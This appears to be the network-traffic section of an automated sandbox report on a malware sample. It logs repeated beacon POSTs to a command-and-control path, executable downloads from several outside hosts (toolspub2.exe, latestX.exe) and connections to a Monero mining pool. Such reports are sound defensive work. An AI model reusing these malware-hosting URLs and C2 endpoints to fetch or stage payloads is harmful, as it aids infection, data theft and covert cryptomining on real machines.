Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| xmr-eu1.nanopool.org | 212.47.253.124 | |
| pastebin.com | 104.20.68.143 | |
| galandskiyher5.com | 194.169.175.127 |
- TCP Requests
-
-
192.168.56.101:49186 104.20.67.143:443pastebin.com
-
192.168.56.101:49174 194.169.175.127:80galandskiyher5.com
-
192.168.56.101:49171 5.42.65.80:80
-
192.168.56.101:49179 5.42.65.80:80
-
192.168.56.101:49187 51.15.193.130:14433xmr-eu1.nanopool.org
-
192.168.56.101:49185 51.15.58.224:14433xmr-eu1.nanopool.org
-
192.168.56.101:49181 79.137.192.18:80
-
192.168.56.101:49178 95.214.27.254:80
-
192.168.56.101:49180 95.214.27.254:80
-
POST
200
http://5.42.65.80/8bmeVwqx/index.php
REQUEST
RESPONSE
BODY
POST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 90
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Oct 2023 00:43:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET
200
http://galandskiyher5.com/downloads/toolspub2.exe
REQUEST
RESPONSE
BODY
GET /downloads/toolspub2.exe HTTP/1.1
Host: galandskiyher5.com
HTTP/1.1 200 OK
Server: nginx/1.20.2
Date: Mon, 16 Oct 2023 00:43:08 GMT
Content-Type: application/x-msdos-program
Content-Length: 231936
Connection: close
Last-Modified: Mon, 16 Oct 2023 00:43:01 GMT
ETag: "38a00-607cab03a3f20"
Accept-Ranges: bytes
POST
200
http://5.42.65.80/8bmeVwqx/index.php
REQUEST
RESPONSE
BODY
POST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Oct 2023 00:43:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET
404
http://95.214.27.254/getfile/taskhost.exe
REQUEST
RESPONSE
BODY
GET /getfile/taskhost.exe HTTP/1.1
Host: 95.214.27.254
HTTP/1.1 404 Not Found
Date: Mon, 16 Oct 2023 00:43:10 GMT
Server: Apache
Content-Length: 196
Content-Type: text/html; charset=iso-8859-1
POST
200
http://5.42.65.80/8bmeVwqx/index.php
REQUEST
RESPONSE
BODY
POST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Oct 2023 00:43:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET
404
http://95.214.27.254/getfile/winlog.exe
REQUEST
RESPONSE
BODY
GET /getfile/winlog.exe HTTP/1.1
Host: 95.214.27.254
HTTP/1.1 404 Not Found
Date: Mon, 16 Oct 2023 00:43:12 GMT
Server: Apache
Content-Length: 196
Content-Type: text/html; charset=iso-8859-1
POST
200
http://5.42.65.80/8bmeVwqx/index.php
REQUEST
RESPONSE
BODY
POST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Oct 2023 00:43:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET
404
http://95.214.27.254/getfile/msedge.exe
REQUEST
RESPONSE
BODY
GET /getfile/msedge.exe HTTP/1.1
Host: 95.214.27.254
HTTP/1.1 404 Not Found
Date: Mon, 16 Oct 2023 00:43:12 GMT
Server: Apache
Content-Length: 196
Content-Type: text/html; charset=iso-8859-1
POST
200
http://5.42.65.80/8bmeVwqx/index.php
REQUEST
RESPONSE
BODY
POST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Oct 2023 00:43:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET
200
http://79.137.192.18/latestX.exe
REQUEST
RESPONSE
BODY
GET /latestX.exe HTTP/1.1
Host: 79.137.192.18
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Oct 2023 00:43:16 GMT
Content-Type: application/octet-stream
Content-Length: 5874968
Last-Modified: Sun, 06 Aug 2023 06:35:01 GMT
Connection: keep-alive
ETag: "64cf3f15-59a518"
Accept-Ranges: bytes
POST
200
http://5.42.65.80/8bmeVwqx/index.php
REQUEST
RESPONSE
BODY
POST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Oct 2023 00:43:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST
200
http://5.42.65.80/8bmeVwqx/index.php
REQUEST
RESPONSE
BODY
POST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Oct 2023 00:43:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST
200
http://5.42.65.80/8bmeVwqx/index.php
REQUEST
RESPONSE
BODY
POST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Oct 2023 00:43:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST
200
http://5.42.65.80/8bmeVwqx/index.php
REQUEST
RESPONSE
BODY
POST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Oct 2023 00:43:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
| Flow | Issuer | Subject | Fingerprint |
|---|---|---|---|
|
TLS 1.3 192.168.56.101:49185 51.15.58.224:14433 |
None | None | None |
|
TLS 1.3 192.168.56.101:49186 104.20.67.143:443 |
None | None | None |
|
TLS 1.3 192.168.56.101:49187 51.15.193.130:14433 |
None | None | None |
Snort Alerts
No Snort Alerts